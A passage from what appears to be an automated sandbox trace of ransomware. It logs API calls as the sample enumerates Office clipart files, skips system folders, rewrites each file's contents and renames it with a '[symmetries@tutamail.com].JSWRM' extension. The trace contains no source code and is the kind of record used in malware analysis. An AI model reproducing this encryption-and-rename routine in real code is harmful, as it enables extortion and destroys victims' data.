lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099155.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099155.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0079.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0079.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0079.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099155.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099155.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.690] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8826) returned 1 [0079.690] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2270) returned 0x205850 [0079.690] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2270, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2270, lpOverlapped=0x0) returned 1 [0079.692] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.692] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2270, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2270, lpOverlapped=0x0) returned 1 [0079.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.692] CloseHandle (hObject=0x314) returned 1 [0079.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0079.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0079.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0079.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0079.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0079.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0079.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.693] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099155.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099155.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099155.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099155.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0079.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0079.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0079.694] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe081920, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe081920, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe081920, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3682, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099156.JPG", cAlternateFileName="")) returned 1 [0079.694] lstrcmpiW (lpString1="J0099156.JPG", lpString2=".") returned 1 [0079.694] lstrcmpiW (lpString1="J0099156.JPG", lpString2="..") returned 1 [0079.694] lstrcmpiW (lpString1="J0099156.JPG", lpString2="...") returned 1 [0079.694] lstrcmpiW (lpString1="J0099156.JPG", lpString2="windows") returned -1 [0079.694] lstrcmpiW (lpString1="J0099156.JPG", lpString2="recovery") returned -1 [0079.694] lstrcmpiW (lpString1="J0099156.JPG", lpString2="perflogs") returned -1 [0079.694] lstrcmpiW (lpString1="J0099156.JPG", lpString2="documents and settings") returned 1 [0079.694] lstrcmpiW (lpString1="J0099156.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.694] lstrcmpiW (lpString1="J0099156.JPG", lpString2="system volume information") returned -1 [0079.694] lstrcmpiW (lpString1="J0099156.JPG", lpString2="msocache") returned -1 [0079.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0079.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099156.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099156.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099156.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0079.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0079.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099156.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099156.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099156.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0079.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0079.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0079.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0079.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099156.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099156.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.695] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13954) returned 1 [0079.695] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3680) returned 0x24d210 [0079.695] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3680, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3680, lpOverlapped=0x0) returned 1 [0079.702] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.704] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3680, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3680, lpOverlapped=0x0) returned 1 [0079.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.705] CloseHandle (hObject=0x314) returned 1 [0079.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0079.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0079.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0079.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0079.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0079.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0079.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.709] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099156.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099156.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099156.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099156.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0079.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0079.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0079.710] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe081920, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe081920, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe081920, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x25c7, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099157.JPG", cAlternateFileName="")) returned 1 [0079.710] lstrcmpiW (lpString1="J0099157.JPG", lpString2=".") returned 1 [0079.710] lstrcmpiW (lpString1="J0099157.JPG", lpString2="..") returned 1 [0079.710] lstrcmpiW (lpString1="J0099157.JPG", lpString2="...") returned 1 [0079.710] lstrcmpiW (lpString1="J0099157.JPG", lpString2="windows") returned -1 [0079.710] lstrcmpiW (lpString1="J0099157.JPG", lpString2="recovery") returned -1 [0079.710] lstrcmpiW (lpString1="J0099157.JPG", lpString2="perflogs") returned -1 [0079.710] lstrcmpiW (lpString1="J0099157.JPG", lpString2="documents and settings") returned 1 [0079.711] lstrcmpiW (lpString1="J0099157.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.711] lstrcmpiW (lpString1="J0099157.JPG", lpString2="system volume information") returned -1 [0079.711] lstrcmpiW (lpString1="J0099157.JPG", lpString2="msocache") returned -1 [0079.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099157.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099157.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099157.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0079.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099157.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099157.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099157.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0079.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0079.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0079.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0079.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099157.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099157.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.711] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9671) returned 1 [0079.711] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x25c0) returned 0x24d210 [0079.711] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x25c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x25c0, lpOverlapped=0x0) returned 1 [0079.715] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.715] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x25c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x25c0, lpOverlapped=0x0) returned 1 [0079.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.715] CloseHandle (hObject=0x314) returned 1 [0079.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0079.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0079.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0079.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0079.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0079.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0079.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.716] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099157.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099157.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099157.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099157.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0079.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0079.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0079.717] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe081920, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe081920, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe081920, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6630, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099158.WMF", cAlternateFileName="")) returned 1 [0079.717] lstrcmpiW (lpString1="J0099158.WMF", lpString2=".") returned 1 [0079.717] lstrcmpiW (lpString1="J0099158.WMF", lpString2="..") returned 1 [0079.717] lstrcmpiW (lpString1="J0099158.WMF", lpString2="...") returned 1 [0079.717] lstrcmpiW (lpString1="J0099158.WMF", lpString2="windows") returned -1 [0079.717] lstrcmpiW (lpString1="J0099158.WMF", lpString2="recovery") returned -1 [0079.717] lstrcmpiW (lpString1="J0099158.WMF", lpString2="perflogs") returned -1 [0079.717] lstrcmpiW (lpString1="J0099158.WMF", lpString2="documents and settings") returned 1 [0079.717] lstrcmpiW (lpString1="J0099158.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.717] lstrcmpiW (lpString1="J0099158.WMF", lpString2="system volume information") returned -1 [0079.717] lstrcmpiW (lpString1="J0099158.WMF", lpString2="msocache") returned -1 [0079.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099158.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099158.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099158.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0079.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099158.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099158.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099158.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0079.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0079.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0079.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0079.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099158.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099158.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.717] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=26160) returned 1 [0079.717] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6630) returned 0x24d210 [0079.718] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6630, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, 